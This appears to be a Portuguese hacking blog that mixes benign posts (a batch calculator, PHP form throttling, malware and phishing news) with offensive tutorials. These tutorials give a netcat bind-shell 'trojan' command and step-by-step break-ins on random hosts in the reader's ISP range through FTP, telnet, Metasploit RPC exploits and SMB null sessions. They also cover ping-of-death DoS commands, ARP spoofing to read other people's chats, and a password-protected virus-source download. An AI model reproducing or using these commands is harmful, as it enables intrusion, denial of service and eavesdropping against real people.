Técnicas de invasão e defesa

1 coments
Técnicas de invasão e defesaExistem muitas técnicas de invasão e defesa, existem muitas que não são divulgadas na Internet, pois são tão boas e adoráveis que pessoas que descobrem não as divulgam publicamente. Exemplo: Muitos crackers não divulgam as suas técnicas pois seria fodido para eles, pois assim as falhas seriam corrigidas.Vamos acabar com a conversa e partir para a explicaçao.
Não vou falar de todas as tecnicas, até porque eu nao sei de todas existentes. vou falar das mais utilizadas...
Técnicas de Invasão

1º – tem que se definir o alvo
2º – Recolher informações sobre o alvo
3º – Usar ferramentas para a invasão4º – Phishing5º – Esteganografia

<———Tecnicas invasao—————>

1 – definir um alvo

Para definir um alvo, podes usar o google, myspace, orkut, google groups.Exemplo: google* Podes fazer buscas especificas utilizando recursos avançados do google como as tags,Intitle, Inurl, Intext.
Esses recursos podem trazer belos resultados, ou seja, pessoal o GOOGLE É O NOSSO MELHOR AMIGO :)

2 – Engenharia socialengenharia social “é a arte de enganar”Ou seja, através de uma simples conversa de msn podes tentar de forma "manipuladora" recolher algumas informações para te facilitarem a descobrir uma pass ou user (exemplo)

<———Ferramentas para invasão—————>
Existem milhares de ferramentas para penetration(invasão), Porem vou mostrar aqui as melhores, “que eu acho”, (para a ferramenta ser boa, tens que gostar dela! e saber usar).
Dig, Nmap, Nessus, Metasploit, Telnet, Sendip, John the ripper, Host, Hping3, Netcat.=> Dig – É ferramenta quase igual ao nslookup, Porem mais flexível, pode ser utilizada para fazer buscas como A, TXT, MX E NS.

dig +qr google.com any
;; ANSWER SECTION:
google.com. 10186 IN MX 10 smtp2.google.com.
google.com. 10186 IN MX 10 smtp3.google.com.google.com. 10186 IN MX 10 smtp4.google.com.
google.com. 10186 IN MX 10 smtp1.google.com.
google.com. 318637 IN NS ns1.google.com.
google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.google.com. 318637 IN NS ns4.google.com.
;; AUTHORITY SECTION:google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.
google.com. 318637 IN NS ns4.google.com.
google.com. 318637 IN NS ns1.google.com.
;; ADDITIONAL SECTION:
smtp1.google.com. 2986 IN A 72.14.203.25smtp2.google.com. 2986 IN A 64.233.167.25
smtp3.google.com. 2986 IN A 64.233.183.25
smtp4.google.com. 2986 IN A 72.14.215.25ns1.google.com. 345220 IN A 216.239.32.10
ns2.google.com. 345220 IN A 216.239.34.10
ns3.google.com. 345219 IN A 216.239.36.10
ns4.google.com. 345219 IN A 216.239.38.10
=>portScan - O portscan vai "batendo" em cada uma das portas e vê quais estão abertas. Um exemplo de portscan é o nmap. Nmap é um brilhante portScan existente no dia de hoje. É uma otima ferramenta, muito utilizada para invasão, para descobrir falhas nos sistemas e descobrir portas abertas desnecessariamente.


=>Nessus - o Nessus é uma ferramentas de auditoria muito usada para detectar e corrigir vulnerabilidades nos computadores da rede local. Nessus encontra bugs e mostra o link de sites para corrigir os BUGS.

=> Metasploit - Esta é a melhor ferramenta que existe. É utilizado para escrever, testar e executar codigos de exploit. Foi desenvolvido para penetração em sistemas através de programas com bugs(erros).
Metasploit > console e interface web.


=> Telnet - É um protocolo para conectares-te remotamente a sistemas.
telnet www.cmpontadelgada.com 80
Trying 200.189.171.181…
Connected to www.cmpontadelgada.com
Escape character is ‘^]’.
GET / HTTP/1.1
Host: www.cmpontadelgada.com

=> John the ripper - É um programa usado para desencriptar senhas unix, dos, winNT win95 e também MD5, DES baseado na função CRYPT.

=> Hping3 - Ferramenta capaz de enviar pacotes TCP, UDP E ICMP personalizados e receber respostas como consegue em icmp. com ele podemos fazer um ataque DoS.

=> Netcat - Programa para consultoria de redes muito
conhecido, isso deve-se ao facto de ele ser um
programa muito versátil.

TROJAN/nc
nc -l -e /bin/bash -p 1033
A porta 1033 será colocada em listenning, redireccionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém
conectar a essa porta terá domínio total sobre
o computador.

Sniffer/nc
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open

=> Phishing - Phishing é um tipo de fraude projectada para
roubar a identidade de alguém. Num phishing scam,
uma pessoa mal-intencionada tenta obter
informações como números de cartões de
crédito, senhas, dados de contas ou outras
informações pessoais convencendo a vitima a
fornecê-la sob pretextos enganosos.=> jp(hide an seek) - O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.


<—————–Técnicas CONTRA-INVASÃO——————->
Firewall
(NHWK)IDS
HoneyPots
Antispam

=> Firewall - Port Knock, uma solução leve e fácil de
configurar, permite que portas específicas só
sejam abertas no momento desejado através
de tentativas de conexão em portas
específicas.

=>(NHWK)IDS –
NIDS – Network Intrusion Detection System
HIDS – Host-based Intrusion Detection System
WIDS – Wireless Intrusion Detection System
KIDS – Kernel Intrusion Detection System

=> HoneyPots - Útil para vigilância e alerta aos tipos de
ataques mais utilizados porem deve ser
utilizado com cuidado para que o invasor não
tenha acesso á rede real. Pessoal na minha opinião um bom HoneyPot pode levar o Hacker a pensar que está dentro do nosso sistema mas ele está apenas num ambiente virtual :)

=> Antispam - Indispensável para qualquer MX, útil para evitar
email e domínios não confiáveis,
pode ser incrementado com opções de RBL e
CAPTCHA (“Completely Automated Public
Turing test to tell Computers and Humans
Apart”).

Pessoal já sabem alguma duvida podem mandar email que tento ajudar :)

Cumprimentos,
Pirata Da Fajã

Invasão pelas portas 21; 23 ; 135; 445

4 coments
Estou a fazer este tutorial, porque pediram-me. Mas eu odeio este tipo de ataque, pois esse tipo de ataque não satisfaz as nossas necessidades. UMA PERGUNTA: porque pessoas gostam de ficar a invadir computadores aleatoriamente sem saber donde é aquele computador, sem saber de nada?

Eu mesmo respondo. Estas pessoas são "lammers" que vão tentando invadir tudo e qualquer sistema para se gabar para os seus amigos.

Um conselho para todos vocês que sabem invadir ou estão aprender: TU NÃO PRECISAS de DIZER A NINGUÉM QUE SABES SABE INVADIR, POIS QUANDO SURGIR A OPORTUNIDADE, SURPREENDES OUTRAS PESSOAS!

Um tutorial bem simples que é ainda muito usado nos dias de hoje (por lammers).

Invasão pelas portas:

21: FTP

23: TELNET

135: RPC

445: COMPARTILHAMENTO


Vamos começar:

"saque" o seu ip externo(sugestão: www.myip.com).

Faça download do o nmap e instale no seu pc.

Vamos supor que o teu ip seja: 201.33.22.18.

Entre no prompt do Windows e digite nmap. Aparecerá um montão de opções e ajudas para aprenderes a utiliza-lo.

Prosseguindo…

Iremos fazer scanner de portas nos computadores da sua "rede WAN" ou seja de todos os computadores que utilizam o mesmo ISP que vocês...

digite:

nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44

Este comando vai listar todos os IP´s (máquinas) que estão a utilizar o mesmo ISP que vocês

Código:

Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164

Invasão pela porta 21

vamos lá… irá aparecer um conjunto de computadores que têm a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. podes tentar fazer login como anonymous, pois alguns administradores ou pessoas não se preocupam em retirar o user anonymous do ftp.

Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a

Invasão pela porta 23

Iniciar>Executar>cmd>telnet>open>201.33.22 23

Invasão pela porta 135

CASO a porta 135 esteja aberta, podemos usar o METASPLOIT

abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.

depois disso escolha o tipo de conexão como: GERENIC\SHELL_BLIND_TCP

depois disso mantenha as informações por defeito do metasploit que só inclua o ip da vitima.

Invasão pela porta 445

Esta porta é de partilha... SMB

Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:”"

Comando concluído com êxito.
Faça Download do Dumpusers

guarde no C:\
abra o cmd e digite;

dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose

depois vai ao:

iniciar>executar>\\201.45.241.175\c$

Pessoal este tipo de invasão é uma das mais ridículas. Não têm "pica"...
Mas pronto, fiz este tutorial a ouvir um gajo a dizer que na infomática nada é seguro, como se ninguém soubesse.. e o facto de ele dizer que nada é seguro toda a gente olha para ele como se fosse um hacker (para mim é um curioso)...

Cumprimentos...

ClickJacking, um novo perigo na internet...

0 coments

Depois dos trojans e outros códigos maliciosos, a tendência do momento é o clickjacking. Ainda não há correcções definitivas para este problema.

O responsável tecnológico da Whitehat Security, Jeremiah Grossman, explicou à Cnet o funcionamento do clickjacking. O utilizador nem se apercebe, mas todos os seus cliques na Internet podem estar a ser monitorizados por um atacante.

Numa demonstração, Grossman explicou como é simples a um atacante espiar todos os movimentos de um utilizador, recorrendo ao Flash para ligar a sua webcam, sem que este se aperceba.

O atacante cria uma iFrame que coloca no site que pretende atacar. Esse código não é perceptível ao utilizador e é inserido numa parte do site. O utilizador pode estar a clicar em “comprar”, em vez de “cancelar”, se for isso que o atacante tiver escrito no código (o hacker programa os códigos precisamente com o objectivo de ludibriar os utilizadores).

Até agora, há pouco a fazer para evitar este tipo de ataques. As páginas que estiverem optimizadas para Internet Explorer 8 podem não correr estes códigos, mas Grossman adverte que os utilizadores ddo browser da Microsoft devem ter o JavaScript desactivado. No caso do Firefox, basta instalar o add on NoScript, para que se bloqueie o código iFrame.

Fonte exame informatica

Resource Hacker - Edite Progamas .exe

0 coments

O Resource Hacker é uma ferramenta muito interresante para quem trabalha com programação de softwares, ou para quem tem interesse em conhecer como são construidos os programas. Com ela, é possível abrir e modificar arquivos executáveis ( EXE ) . Você poderá fazer várias mudanças, desde comandos internos, até ícones usados pelos aplicativos, e em seguida salvar. Isso é possível, porque o programa possui um descompilador e um compilador interno, que faz com que o aplicativo editado volte a funcionar depois de feitas as modificações. Por Exemplo Como ele pode editar Nome, Imagens e muitas outras coisas de um Servidor, Sendo de Cs, Mu, Ou Habbo, etc, etc

criar calculadora em .bat

0 coments
Pessoal para os iniciantes da programação têm aqui um tutorial muito simples para criarem uma calculadora em .bat, tudo através do bloco de notas :)

Iniciar>executar>cmd>notepad:


@echo off
title Programa que faz calculos by Miguel PEreira
:inicio
cls
echo Digite o numero correspondente ao calculo que queres fazer
echo.
echo.
echo 1-Adicao
echo 2-Subtracao
echo 3-Multiplicacao
echo 4-Divisao
echo.
set /p calculo=
if %calculo%==1 goto adicao
if %calculo%==2 goto subtracao
if %calculo%==3 goto multiplicar
if %calculo%==4 goto dividir
:adicao
cls
echo Digite o primeiro numero que queres somar
set /p n1=
cls
echo Digite o segundo numero
set /p n2=
cls
set /a n3=%n1%+%n2%
echo %n1%+%n2%=%n3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao=
if %opcao%==v goto inicio
if %opcao%==s exit
:subtracao
cls
echo Digite o primeiro numero que queres subtrair
set /p nn1=
cls
echo Digite o segundo numero
set /p nn2=
cls
set /a nn3=%nn1%-%nn2%
echo %nn1%-%nn2%=%nn3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao1=
if %opcao1%==v goto inicio
if %opcao1%==s exit
:multiplicar
cls
echo Digite o primeiro numero que queres Multiplicar
set /p n1=
cls
echo Digite o segundo numero
set /p n2=
cls
set /a n3=%n1%*%n2%
echo %n1%X%n2%=%n3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao=
if %opcao%==v goto inicio
if %opcao%==s exit
:dividir
cls
echo Que numero desejas dividir
set /p n1=
cls
echo Por quanto desejsa dividir
set /p n2=
cls
set /a n3=%n1%/%n2%
echo %n1%:%n2%=%n3%
pause
cls
echo O que deseja fazer?
echo .
echo .
echo V-Voltar ao menu
echo S-sair do programa
set /p opcao=
if %opcao%==v goto inicio
if %opcao%==s exit

File>Save As> Salve como: calculadora.bat

Descoberto Trojan que desfalca contas e apresenta extractos falsos

0 coments
O URLZone já começou a fazer vítimas na Alemanha. O trojan mais sofisticado do momento estima quanto dinheiro têm as vítimas e desfalca contas que estão em uso. No final apresenta extractos falsos.

Os trojans libertam os cibernautas do excesso de dinheiro.

A "descoberta" foi feita pela empresa de segurança electrónica Finjan, que analisou o método de ataque do novo código malicioso e já alertou as autoridades alemãs.

Notícia da Cnet revela que o sofisticado Trojan estará a ser comandado a partir de um servidor sediado na Ucrânia.

O código malicioso consegue estimar o dinheiro que cada vítima terá no banco e não só intercepta os códigos de acesso a contas bancárias, como procede ao desfalque ao mesmo tempo que o utilizador acede ao banco via Internet.

Os investigadores da Finjan informam que o URLZone pode entrar em acção em Browsers Firefox e Opera, bem como Internet Explorer 6, 7 e 8.

É especializado em sistemas operativos Windows e tem por ponto de partida um executável que pode ser inserido em páginas com JavaScript, ficheiros PDF, entre outros formatos e tecnologias.

Curiosamente, os investigadores da Finjan conseguiram entrar no servidor que comanda o URLZone (tinha sido deixado a funcionar sem barreiras de segurança...) e descobriram que mais de 90 mil computadores já visitaram sites maliciosos que terão infectado cerca de 6400 máquinas.

Das máquinas infectadas resultaram algumas centenas de contas desfalcadas.

Cuidado Pessoal.

Cumprimentos,
Pirata da Fajã...

Mais um Aviso, email falso...

1 coments
Recebi hoje (4/4/2010) através do Hotmail (ver imagem a cima) , um e-mail curioso " DENUNCIA (A PSP e a Portugal Telecom precisa entrar em conctato consigo urgente.)‏ " e que me chamou à atenção para mais uma obra de algum, não sei bem o que lhe chamar, porque HACKER não é de certeza, chamo mais uns filhos da put... que já deveria ter sido apagado do mapa em vez de andarem a difamar o que pode chamar de HACKER.

Este e-mail é mais uma atentado ao descuido de muitos e que pode vir a trazer problemas a algumas pessoas que não leiam entre as linhas.

Uma das coisa que mais me saltou à vista foi a palavra CELULAR. Ora no meu Português, esta palavra não consta. Onde consta é no Português BR logo aí dá para ver a veracidade do e-mail. Mas para ver os resultados fui um pouco mais à frente para poder de algum modo ajudar quem clicar em SITE.
Se clicarem, vão ser redireccionados não para o site da PT nem da PSP mas sim um site Chinês, que é uma cópia barata do site da PT (ver imagem abaixo) onde consta mais um item que é Crimes na Internet.




Depois de abrir a página para onde me enviava o Link Site, editei o código fonte por curiosidade, e na verdade verifiquei que nele não havia nada que pudesse fazer algum mal. O problema era que passados 60 seg nos solicitava para instalar um plugin do flash que esta a faltar no nosso PC.
Para quem não estivesse atento e clicasse e para instalar o plugin acabava por instalar um keylogger ou um trojan de certeza.
Se tivessem um pouco mais atentos verificavam que o endereço de plugin não era para o site da adob mas sim onde estava alojado o dito keylogger ou trojan.

Pelo facto, se receberem este tipo de e-mail no vosso hotmail o mais fácil é apagar.

Abraços Pessoal e caguem nisso!

Virus Source Code Database - 6000 Vírus activos

0 coments
*** ATENÇÃO ***
O Virus Source Code Database (VSCDB) é apenas com fins de estudo e pesquisa assim como para entusiastas sobre vírus informático. Não será fornecida qualquer garantia implícita ou de qualquer software listagens aqui contidas. Vocês assumem a total responsabilidade por quaisquer danos causados pela elaboração, execução, ou de partilha esta informação.
Estejam cientes de que a execução de qualquer código malicioso no computador ou rede, de outrem pode ser um acto criminoso. Usem por vossa própria conta e risco!

----------------------------------------------------------------------
1. Depois de extraírem não devem de correr qualquer deles.
2. Se não sabem o que fazem, devem de parar por aqui. Não digam que não avisei.

Tanto este Blog, como o seu Administrador Pirata Da Faja, não nos responsabilizamos por estragos efectuados a terceiros. Utilizem por vosso próprio risco.

(Este vírus estão para descarga como um exemplo e devem ser vistos como elemento didáctico para este blog)

Download
Pass: auToeXeCw0rm

Proteja-se contra brute-forces

0 coments
Um tipo de ataque que pode causar uma paragem bruta do PHP (e um possível DDoS) é uma “chuva” de submits, talvez uma tentativa de brute-force onde um (ou mais) formulário é preenchido e enviado várias vezes consecutivas na tentativa de derrubar o servidor ou só descobrir uma senha.

Isso acontece, dependendo do servidor e das configurações do mesmo, o PHP não vai conseguir dar conta de tantas requisições, vai ficar perdido e vai parar… Há possibilidade de evitar este tipo de “ataque” fazendo alguns ajustes no servidor e instalando alguns mods do Apache… Mas há também como proteger em-se disso directamente no PHP, e é disso que vou falar hoje.

Antes de tudo vamos falar de algo óbvio, mas que pouca gente deve ter percebido: a variável global $_POST existe sempre… Independente se houve ou não um submit antes. Quando estão a navegar pelo site o $_POST (que é um array) vai ser sempre vazio, sem elementos, e quando houverem dados para o PHP processar (depois de um submit) vai passar a ser um array com elementos.

Então, no começo do nosso script, precisamos verificar se há algum valor dentro de $_POST, se ele não está vazio:

// Verifica se $_POST não está vazio
if (!empty($_POST)) {
// :]
}

?>


Agora que já sabemos quando houve um submit, vamos verificar se existe um valor salvo na sessão que nos informará a hora exacta do último submit aceite pelo sistema (em UNIX TIMESTAMP)… Por questão de optimização de código também vamos colocar, directo no mesmo IF, uma verificação que compara esse horário procurando na sessão (caso ele exista) com o horário actual… Vamos directo ao script para ser mais fácil de entender:

// Verifica se $_POST não está vazio
if (!empty($_POST)) {
$segundos = 10; // Tempo mínimo entre dois submits (em segundos)
$agora = time(); // "Agora" em UNIXTIMESTAMP

// Verifica se a variável da sessão existe E verifica a diferença de tempo
if (isset($_SESSION['ultimoSubmit']) AND ($_SESSION['ultimoSubmit'] > ($agora - $segundos))) {
// O submit será bloqueado
}
}

?>
 
Viram? Caso o IF seja verdadeiro vamos bloquear o submit com um echo e um exit (podem ainda redirecionar o visitante para outro local, ou fazer da forma como preferirem)… E caso o IF seja falso o script continuará normalmente…

// Verifica se $_POST não está vazio
if (!empty($_POST)) {
$segundos = 10; // Tempo mínimo entre dois submits (em segundos)
$agora = time(); // "Agora" em UNIXTIMESTAMP

// Verifica se a variável da sessão existe E verifica a diferença de tempo
if (isset($_SESSION['ultimoSubmit']) AND ($_SESSION['ultimoSubmit'] > ($agora - $segundos))) {
// O submit será bloqueado
echo "Aguarde mais de {$segundos} segundos para enviar o formulário!";
exit;
}
// Salva a hora do último submit
$_SESSION['ultimoSubmit'] = $agora;
}

?>
 
Prestem atenção nas linhas marcadas…
Nas linhas 11 e 12 será onde ocorre o bloqueio em si e na linha 15 onde salvamos o horário do último submit caso ele seja aceite.

Caso pretenderem bloquear todas as tentativas de submit que não tenham $segundos entre si, necessitam de salvar o horário do ultimo submit mesmo quando bloquear a tentativa, da seguinte forma:
 
// Verifica se a variável da sessão existe E verifica a diferença de tempo
if (isset($_SESSION['ultimoSubmit']) AND ($_SESSION['ultimoSubmit'] > ($agora - $segundos))) {
// O submit será bloqueado
$_SESSION['ultimoSubmit'] = $agora;
echo "Aguarde mais de {$segundos} segundos para enviar o formulário!";
exit;
}
 
Atenção: Esse script não vos protege totalmente contra ataques brute-force ou DDoS, apenas AJUDA a
evitar que isso aconteça.

Cumprimentos
Pirata Da Fajã

Como encontrar vulnerabilidades nos meus programas...

0 coments

Todo programa é vulnerável a alguma falha!

Vou citar aqui algumas das falhas mais comuns de hoje em dia…

Buffer overflow: gets (), a função scanf (), sprintf (), strcat (), strcpy ()

Formato string vulnerabilidades: printf (), fprintf (), vprintf (), snprintf (), vsnprintf (), o syslog ()

Race conditions: acesso (), chown (), chgrp (), chmod (), o mktemp (), tempnam (), tmpfile (), tmpnam ()

Número aleatório vulnerabilidades aquisição: rand (), random ()

Estas são somente algumas das falhas mais famosas que programadores na hora que estão criando seus programas, cometem, Porem não podemos culpar os programadores até porque todos nós somos humanos, ninguém é perfeito...

vou diser aqui alguns programas de "scan" de vulnerabilidades.

Alguns programas não fazem"scan" a vulnerabilidades de programas feitos por si mesmo ou por outras pessoas, porem tens que encontrar uma vulnerabilidade de tua autoria.. Código Fonte a vulnerabilidades de segurança irá variar entre linguagens e plataformas.

Itens para procurar em C código incluem:

Shell metacharacter vulnerabilidades: exec (), popen (), system ()

ALGUNS DOS PROGRAMAS MAIS UTILIZADOS QUE AJUDAM A DESCOBRIR FALHAS…

Flawfinder 1.27

Este é um programa que analisa o código fonte e relatórios possíveis a deficiências de segurança(falha), ordenadas por nível de risco. É muito útil para encontrar e remover rapidamente, pelo menos, alguns potenciais problemas de segurança antes de um programa amplamente divulgado ao publico.(para Linux)

RATAS da Secure Software Solutions

faz "scan" C, C + +, Perl, PHP e Python o código fonte para potenciais vulnerabilidades de segurança.

ITS4 de Cigital:

faz um scan ao código fonte procurando potencialmente vulneráveis função chamadas e pré código fonte análise para determinar o nível de risco.

PScan: Um pequeno problema scanner para arquivos de origem C. Peak quantification using Statistical Comparative ANalysis

BOON: Buffer Overrun detecção. BOON é uma ferramenta para a saturação do buffer, e automaticamente encontra vulnerabilidades em código fonte C. Saturações de buffer são um dos tipos mais comuns de falhas de segurança.

MOPS: Programas de Segurança MOdelchecking propriedades. MOPS é uma ferramenta para encontrar bugs de segurança e de programas em C para verificar a conformidade com as regras de programação defensiva.

Cqual: Uma ferramenta para a inclusão de tipo qualificativas para C. cqual digitado é baseado em uma ferramenta de análise para encontrar bugs em programas C.

MC: Meta-Nível Compilação

SLAM: Microsoft

ESC/Java2: Extensão Static. Verificado para Java

Splint: Programação Segura Lint. Splint é uma ferramenta para verificar estaticamente programas C de vulnerabilidades de segurança e codificação erros.

Ciclomotor: Um Modelo-Verificador de Pushdown Sistemas

JCAVE: JavaCard applet Verificação Ambiente

Toolkit Boop: Utiliza captação e requinte para determinar a acessibilidade de pontos no programa um programa C . É uma ferramenta baseada no modelo verificando os algoritmos do SLAM toolkit para um subconjunto da linguagem de programação Externas C .

Blast: Berkeley Software Lazy Abstraction Verificação Ferramenta

Uno: Simples ferramenta para análise de código fonte

PMD: Scans ao Java de código fonte e olha para os potenciais problemas

C + + Teste: Unidade de ensaio e ferramenta de análise estática


Cumprimentos,

Pirata Da Faja

Backtrack 4

0 coments


Boas pessoal chegou o novo BackTrack4, é sem dúvida uma ferramenta essencial para quem "ama" segurança como eu...
È um sistema operativo com centenas de aplicativos, é grátis e 100% fiavel :)

"

Back | Track é o TOP das distribuições GNU / Linux live / com sua instalação e compilação focada na área de segurança da informação, como avaliação e testes de penetração em sistemas. Distribuição com foco em testes de seguranças e pen tests (testes de penetração), muito apreciada por hackers e criada pelos mesmos, pode ser iniciada diretamente pelo CD ou midia removivel sem necessidade de instalar em disco. É altamente indicada, para Pentesters, Testers, Analistas em Segurança, Administradores de Redes, Auditores e outros profissionais que se preocupam, valorizam e protegem a Segurança das Empresas. Em poucos segundos, você vai ter um sistema completo pronto para o seu trabalho.

Foi evoluído da combinação de duas distribuições bem difundidas - Whax e Auditor Security Collection. Juntando forças e substituindo essas distribuições, BackTrack ganhou uma popularidade massiva e foi eleito em 2006 como a Distribuição Live de Segurança número 1 em sua categoria, e 32º no geral, pela Insecure.org. Profissionais de segurança, assim como novatos, estão usando BackTrack como seu kit de ferramentas favorito pelo mundo todo.

BackTrack tem uma longa história e foi baseado em várias distribuições de Linux diferentes até agora ser baseado em uma distribuição Linux Slackware e os scripts do live CD correspondentes por Tomas M. (www.slax.org). Cada pacote, configuração de kernel e script é otimizado para ser utilizado pelos testadores de penetração de segurança. Patches e automação têm sido adicionados, aplicados e desenvolvidos para oferecer um ambiente organizado e pronto para a viagem.

Após ter chegado em um procedimento de desenvolvimento estável durante os últimos lançamentos, e consolidando feedbacks e complementos, o time focou-se em dar suporte a mais dispositivos de hardware, e novos dispositivos, bem como oferecer mais flexibilidade e modularidade por meio da reestruturação de processos de construção e manutenção. Com a atual versão, a maioria das aplicações são construídas como módulos individuais que ajudam a acelerar os lançamentos de manutenção e correções.

Por Metasploit ser uma das ferramentas-chave para a maioria dos analistas, ele é estreitamente integrado no BackTrack e ambos os projetos colaboram juntos para sempre providenciar uma implementação detalhada do Metasploit dentro das imagens do CD-Rom do BackTrack ou nas futuras imagens de virtualização mantidas e distribuições da remote-exploit.org (como aplicações de imagens VMWare).

Ser superior e fácil de usar é a chave para um bom Live-CD de segurança. Pega-se coisas um passo adiante e alinha o BackTrack às metodologias de teste de penetração e frameworks de avaliação (ISSAF e OSSTMM). Isso irá ajudar nossos usuários profissionais durante seus pesadelos de relatório diário.

Atualmente BackTrack consiste de mais de 300 ferramentas prontas, diferentes e atualizadas, que são logicamente estruturadas de acordo com o fluxo de trabalho de profissionais de segurança. Essa estrutura permite até novatos encontrar as ferramentas relacionadas a uma tarefa específica para ser cumprida. Novas tecnologias e técnicas de teste são combinadas no BackTrack o mais rápido possível para mantê-lo atualizado.

Nenhuma plataforma de análise comercial ou livremente disponível oferece um nível equivalente de usabilidade com configuração automática e foco em testes de penetração.

Nascido a partir da fusão entre históricos e Auditor e Whax inicialmente baseada Slax, a libertação número 4 codinome pwnsauce a distribuição adota um sistema baseado no Debian e Ubuntu (8.10 i386 32 bits) com o seu próprio repositório, oferecendo uma vasta gama software gerenciável através do Gestor de pacotes APT"

Fonte: BackTrack


explicação "Ping Of Death"

0 coments
Explicação do "ping da morte"

O que é o ping da morte?

Ping da morte é um comando usado pelo protocolo icmp. Porem esse comando ping foi criado para testar a rede. Entretanto hackers começaram a usa-lo para o mal...

O comando ping envia 4 pacotes de 32 bytes para um destino.
E este comando serve para verificar a conectividade de uma rede e até mesmo na Internet.

Para testar uma conectividade de um computador ou site, servidor… Entre no prompt command e digite: ping
Os pacotes serão enviados e recebidos e o sistema retornará uma resposta:
estatísticas do ping: pacotes enviados= 4 recebidos = 4 perdidos = 0 (0% de perda)

Mas estes pacotes não fazem mal algum, pois são pequenos de mais para afectar algum sistema(32 bytes), e são só 4 pacotes.

Imagine se fossem 65500 bytes!

A placa de rede teria sérios problemas, ao responder tudo isso, gerando lentidão e até um "crash" do servidor. Agora, observem a facilidade do comando.

ping -l- 65500 -t

Substitua o destino pelo nome ou IP do computador (por exemplo):

ping -l- 65500 -t 200.200.200.200
ou
ping -l- 65500 -t

Muitas pessoas usam este ataque, pois é um ataque simples de fazer e pode se fazer de qualquer maquina, pois não precisa de programas para fazer esse ataque.
abrem a janela “PROMPT COMMAND” diversas vezes, enviando diversos pacotes seguidos para o IP da vítima, que acaba sofrendo com o "travamento" da placa, que não consegue processar tanta informação seguida.

Para entenderes o parâmetro do comando, basta digitalizar no prompt command o comando: PING
e aparecerá a ajuda do protocolo ping.
mas, vou explicar este parametro,”ping -l- 90000 -t 200.201.10.27″.

$ o ping envia pacotes;
$a opção “-L-” determina o tamanho dos pacotes (máximo de 65500 bytes)
$a opção “-T” determina que o comando deve ser executado até o usuário cancelar (pode ser cancelado pressionando “CTRL + C”);

Pessoal este é um ataque muito antigo, um bom servidor já está protegido contra este tipo de ataque, mas nunca se esqueçam, NADA É SEGURO :)

Cumprimentos,
Pirata Da Fajã

capturar conversas do msn com dsniff

2 coments
Usando msn shadow e dsniff para capturar conversas de msn, icq etc…

Lógica do sniffing para capturar conversar em rede:

Tem alguém na sua rede, conversando no msn com outra pessoa, daí usas o arpspoof para avisar todos computadores da rede, que o seu computador está como servidor, Sendo assim, tudo que entrar ou sair da rede terá que passar pelo seu computador(tipo um proxy transparente).

Daí, entra a tarefa do msn shadow que capturará todas as conversas.

Vamos la, para entenderes melhor o tutorial…

A ferramenta MSN Shadow possui a função de capturar as mensagens instantâneas que "trafica" pela rede com protocolos como MSN, Yahoo messenger, jabber. A ferramenta pode ser usada tanto com rede sem fio como em rede com fio, bastante simples de seleccionar a interface de rede na qual encontra-se ligado.

O MSN Shadow permite visualizar em tempo real as mensagens instantâneas que "traficam pela rede, e também existe a possibilidade de capturar as conversas que ocorrem por meio de vídeo conferencia podendo ser salvo em formato de vídeo.

Para que o ataque seja realizado com sucesso, primeiro devemos activar o encaminhamento de pacotes IP para que o tráfego da rede chegue aos destinos predefinidos.

O dsnif auxilia o MSN Shadow na captura dos pacotes com a ferramenta arpspoof. O arpspoof é executado contra o gateway da rede, fazendo com que todos os pacotes tenham que passar primeiro pela maquina do investigador, fazendo isso todo o tráfego da rede passa primeiro pela maquina que está sendo executado o MSN Shadow.

Activação do encaminhamento de pacotes IP:

#echo 1 > /proc/sys/net/ipv4/ip_forward

Execução do comando arpspoof que enviará pacotes de broadcast, avisando toda a rede que os ip’s possuem o endereço Mac da maquina atacante:

#arpspoof [endereco Ip do gateway]

#arpspoof [endereco IP da vitima]

OBS: se vocês acharem muito complicado podem usar o Wireshark que é muito mais sinples e funciona em linux e windows

Cumprimentos,
Pirata da Faja

Programar em Assembly

0 coments
Este é um programa simples, para os iniciantes aprenderem como é feito um programa em Assembly. Não tão complicado como tem em outros sites, vou ensinar a criar o programa. Código por código, para vocês realmente aprenderem.

Vamos lá…

Para criar um programa que imprimirá na tela a mensagem Ola mundo,

Primeiramente tens que arrumar uma tabela ASCII em mãos.

E para quem não sabe nem o que é uma tabela ASCII, pesquise o que é neste momento e depois volte a ler este tutorial de escrita de um programa em assembly. (google é nosso amigo) :)

